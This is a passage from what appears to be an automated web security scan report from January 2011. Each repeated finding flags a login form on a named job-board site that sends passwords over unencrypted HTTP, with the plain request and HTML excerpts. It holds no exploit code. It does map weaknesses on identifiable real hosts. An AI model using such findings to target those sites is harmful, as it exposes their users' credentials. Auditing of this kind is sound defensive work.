rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">  <input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
      <input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.95. http://www.publicinterestcrossing.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.publicinterestcrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.publicinterestcrossing.com/index.php

The form contains the following password field:

clslogin_password

Request

GET / HTTP/1.1
Host: www.publicinterestcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:29:34 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=d0md3kboqphlouu186urplhea4; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:29:34 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:29:34 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:29:34 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:29:34 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:29:34 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:29:34 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:29:34 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:29:34 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 104328

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.publicinterestcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">  <input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
      <input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.96. http://www.publishingcrossing.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.publishingcrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.publishingcrossing.com/index.php

The form contains the following password field:

clslogin_password

Request

GET / HTTP/1.1
Host: www.publishingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:42:22 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=hjafrla8sm0vjpuuvbsqohvh76; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:42:22 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:42:22 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:42:22 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:42:22 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:42:22 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:42:22 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:42:22 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:42:22 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 114373

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.publishingcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">  <input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
      <input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.97. http://www.purchasingcrossing.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.purchasingcrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.purchasingcrossing.com/index.php

The form contains the following password field:

clslogin_password

Request

GET / HTTP/1.1
Host: www.purchasingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:42:11 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=jp7jhr7hfsn4u1q0tf9pujn7l0; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:42:11 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:42:11 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:42:11 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:42:11 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:42:11 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:42:11 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:42:11 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:42:11 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 105391

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.purchasingcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">  <input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
      <input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.98. http://www.qaqccrossing.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.qaqccrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.qaqccrossing.com/index.php

The form contains the following password field:

clslogin_password

Request

GET / HTTP/1.1
Host: www.qaqccrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:25:53 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=2cvnjstpd6ib3smaikg60ai1v0; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:25:53 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:25:53 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:25:53 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:25:53 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:25:53 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:25:53 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:25:53 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:25:53 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 120361

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.qaqccrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">  <input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
      <input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.99. http://www.radiocrossing.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.radiocrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.radiocrossing.com/index.php

The form contains the following password field:

clslogin_password

Request

GET / HTTP/1.1
Host: www.radiocrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:39:13 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=beoah5h5h42a821e8g7r1l0ko5; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:39:13 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:39:13 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:39:13 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:39:13 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:39:13 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:39:13 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:39:13 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:39:13 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 113112

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.radiocrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">  <input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
      <input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.100. http://www.realestateandlandcrossing.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.realestateandlandcrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.realestateandlandcrossing.com/index.php

The form contains the following password field:

clslogin_password

Request

GET / HTTP/1.1
Host: www.realestateandlandcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:42:57 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=om23b647f73v2jeihjo6qjanv4; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:42:57 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:42:57 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:42:57 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:42:57 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:42:57 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:42:57 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:42:57 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:42:57 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 133093

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.realestateandlandcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">  <input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
      <input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.101. http://www.recruitingcrossing.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.recruitingcrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.recruitingcrossing.com/index.php

The form contains the following password field:

clslogin_password

Request

GET / HTTP/1.1
Host: www.recruitingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:29:23 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=rtub18ulrc3vam4sd88gmoelh0; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:29:24 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:29:24 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:29:24 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:29:24 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:29:24 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:29:24 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:29:24 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:29:24 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 105534

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.recruitingcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">  <input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
      <input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.102. http://www.researchingcrossing.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.researchingcrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.researchingcrossing.com/index.php

The form contains the following password field:

clslogin_password

Request

GET / HTTP/1.1
Host: www.researchingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:42:42 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=14bsqa9jfj35kburppunl56pe1; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:42:43 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:42:43 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:42:43 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:42:43 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:42:43 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:42:43 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:42:43 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:42:43 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 112960

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.researchingcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">  <input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
      <input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.103. http://www.resumeboomer.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resumeboomer.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.resumeboomer.com/

The form contains the following password field:

password

Request

GET / HTTP/1.1
Host: www.resumeboomer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:41:25 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=rflo577r2gvrm7p49d1ei6a8c1; path=/; domain=resumeboomer.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18190

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

<form action="#" method="post" name="resumelogin1">
<div style="font-size:20px; font-weight:bold; padding-left:100px; padding-top:10px;">
...[SNIP]...
<td><input type="password" id="password" name="password" class="input_text" value="Password" onFocus="onfocusval('password','Password')" onBlur="onblurval('password','Password')" /></td>
...[SNIP]...

6.104. http://www.retailcrossing.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.retailcrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.retailcrossing.com/index.php

The form contains the following password field:

clslogin_password

Request

GET / HTTP/1.1
Host: www.retailcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:38:47 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=0f8bbnd9tsuoh4h0j5d47on745; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:38:47 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:38:47 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:38:47 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:38:47 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:38:47 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:38:47 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:38:47 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:38:47 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 105722

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.retailcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">  <input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
      <input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.105. http://www.sciencescrossing.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sciencescrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.sciencescrossing.com/index.php

The form contains the following password field:

clslogin_password

Request

GET / HTTP/1.1
Host: www.sciencescrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:42:01 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=16dk0s9ru5o61n37p22c60grs4; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:42:01 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:42:01 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:42:01 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:42:01 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:42:01 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:42:01 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:42:01 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:42:01 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 139820

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.sciencescrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">  <input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
      <input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.106. http://www.scientistcrossing.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.scientistcrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.scientistcrossing.com/index.php

The form contains the following password field:

clslogin_password

Request

GET / HTTP/1.1
Host: www.scientistcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:42:44 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=rkh4pgjirjhh2qdflm011inei3; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:42:44 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:42:44 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:42:44 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:42:44 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:42:44 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:42:44 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:42:44 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:42:44 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 107194

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.scientistcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">  <input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
      <input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.107. http://www.sellingcrossing.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sellingcrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.sellingcrossing.com/index.php

The form contains the following password field:

clslogin_password

Request

GET / HTTP/1.1
Host: www.sellingcrossing.com
Accept: */*
Accept-Language: en
